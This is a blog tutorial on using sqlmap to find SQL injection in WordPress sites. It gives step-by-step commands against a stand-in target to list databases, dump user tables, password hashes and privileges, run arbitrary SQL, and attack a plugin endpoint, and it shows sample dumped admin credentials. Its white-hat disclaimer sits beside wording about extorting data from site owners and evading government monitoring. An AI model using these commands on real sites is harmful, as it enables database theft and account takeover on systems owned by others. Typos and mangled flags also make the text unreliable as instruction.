We talked about SQL injection in older article. Here is a sqlmap tutorial for WordPress SQL injection testing for the beginners to test own website for potential vulnerabilities & fix them. This website and tutorial is intended for White Hat purposes only. Of course trying them upon others vulnerable WordPress installation will find the points and at the end it is possible to hack it. That is not we are teaching. We are teaching to test them on own websites – live or custom created for test. We can only teach the basics, to create an understanding of how the real tool with real hacker works.
Whether you can research, use proxy, use safe strategies to protect from Governmental spyware that is dependent on your future growing knowledge. This is official website of salmap :
1 2 | http://sqlmap.org https://github.com/sqlmapproject/sqlmap/wiki/Usage |
Basic theory is that – WordPress has URLs with the syntax /vulnerable.php?id=IDIOT. sqlmap is a suitable tool to extort good amount of information which the site owner dislikes to disclose.
---
sqlmap Tutorial : WordPress SQL Injection Testing
For the most it is practical to use SSH screen aka own server to run test. So SSH to your server and become root user. Change directory to somewhere like /tmp. Clone the official repo of sqlmap :
1 2 3 | git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap* ls -al |
You’ll notice that there are files like sqlmap.conf, sqlmap.py, sqlmapapi.py. If we run :
1 2 | python sqlmap.py -h python sqlmap.py -hh |
then obviously the tool will show usage options. Your target site is fools-site.com, that site has URL like :
1 | http://fools-site.com/moronic.php?id=69 |
Basically /moronic.php?id=69 should become /moronic/ with a 301 redirection. Although that forgetting escape is not only usage, salmap can nicely run against the submit form URLs like :
1 | http://fools-site.com/form_submit.php |
You can see that we have no comment form, the search is actually on other server. Of course we have contact us page. If we do not have comment, many problems get reduced. Anyway, run this :
1 | sqlmap -u http://fools-site.com/moronic.php?id=69 –dbs |
We have ran exploit using SQL Injection. You have to read the return output carefully, you should have retrieved two database name from that site. The one database is Information_schema and the other one we do not know, you will find. When database name is know then password is only unknown. What that database has you’ll get with these commands :
1 2 3 | python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" -b python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --users --passwords --privileges --roles --threads=10 python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --current-user --is-dba --current-db --hostname --threads=10 |
Take that another database name is fools_db, then we can restive tables :
1 | sqlmap -u http://fools-site.com/moronic.php?id=69 -D fools_db –tables |
You can retrieve users, admin, payment info from above example. If you run :
1 | python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --dump -D fools_db -T users |
You’ll feel as if the database server is yours :
1 2 3 4 5 | +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ | id | hash | name | email | password | permission | system_home | system_allow_only | +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ | 1 | 7QtzDHFO8nDvP900nu | admin | <blank> | <blank> | 3 | <blank> | <blank> | +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ |
You have to crack the 7QtzDHFO8nDvP900nu hash to get text password. Specially for WordPress it can go :
1 | sqlmap --dbms=MySQL -u http://fools-site.com/moronic.php?id=69 -p id -D fools_db -T wp_users --dump |
You can run some commands like the site owner :
1 | python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --sql-query="select now();" |
If there is a vulnerable plugin, this is a funny command :
1 2 | sqlmap -u "http://fools-site.com/wp-admin/admin-ajax.php" --data="action=spAjaxResults&PLUGIN-NAME=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3 |
